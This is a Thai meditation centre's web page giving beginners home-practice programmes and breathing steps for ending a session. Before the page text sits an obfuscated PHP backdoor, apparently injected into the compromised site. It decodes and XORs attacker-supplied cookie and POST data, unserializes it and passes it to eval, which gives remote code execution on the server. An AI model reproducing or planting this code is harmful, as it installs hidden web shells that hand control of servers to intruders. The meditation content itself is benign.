$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} โปรแกรมสำหรับผู้เริ่มปฏิบัติที่บ้าน | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

วีดีโอปฐมนิเทศสำหรับผู้ที่จะเริ่มปฏิบัติใหม่ (รอวีดีโอวรรณสิงห์)

เริ่มปฏิบัติ ›››

เมื่อเราได้ทำความเข้าใจในแนวทางการปฏิบัติอายตนะวิปัสสนากัมมัฏฐานแล้ว การเริ่มต้นปฏิบัติ เริ่มโดยใช้เสียงเพลงประกอบการนั่งสมาธิ ในที่นี้ให้เราปฏิบัติตามเสียงที่พ่อครูบัญชา ได้บรรยายไว้ จากนั้นเมื่อเริ่มมีอาการหมุนวนเกิดขึ้น ให้เราใส่เจตนาลงไปร่วมกับอาการหมุนวนนั้น ในขณะที่ปฏิบัติไม่ต้องไปสนใจกับสิ่งที่มันเกิดขึ้น ให้ปล่อยจิตว่างๆ

โปรแกรมที่ 1

เตรียมพร้อมร่างกาย จิตใจ

โปรแกรมที่ 2

อิริยาบท 4

โปรแกรมที่ 3

สมาธิเหวี่ยง

โปรแกรมที่ 4

นานาจิตตัง

!!! การปฏิบัติในขณะที่จะออกจากสมาธิ !!!

ถ้าเราปฏิบัติอยู่ที่บ้าน ถ้ามีเงื่อนไขเวลาที่จำกัด ถ้าเรามีความจำเป็นต้องหยุด แต่ว่าจิตเรามันยังไม่ยอมหยุด ถ้ามันเหวี่ยงแรงๆ แล้วมันจะหยุดไม่ได้ ให้เราหายใจเข้าลึกๆ ตามลมหายใจเข้าไป กดลมหายใจไว้ก่อน เมื่อมันจะขาดใจแล้วก็ปล่อยออกมาช้าๆ ตามลมหายใจออกมา ทำไปเรื่อยๆ 3-4 ครั้ง จนกว่าจะเบาดีแล้ว จะสบายดีแล้ว ต้องเลือกเวลาหยุดที่สบายที่สุด ถ้ามันยังไม่ยอมหยุด ให้ทำใหม่ หายใจเข้าลึกๆ ตามลมหายใจเข้าไป กดลมหายใจไว้ก่อน เมื่อมันจะขาดใจแล้วก็ปล่อยออกมาช้าๆ ตามลมหายใจออกมา ทำไปเรื่อยๆ เมื่อสบายดีแล้ว ค่อยๆลุกออกจากสมาธิ

ถ้าเกิดข้อสงสัยหลังการปฏิบัติ สามารถถามมาที่ครูบาอาจารย์หรือพี่เลี้ยงได้ที่ plarnkhoi@hotmail.com หรือ 089-997-6332 , 082-876-7129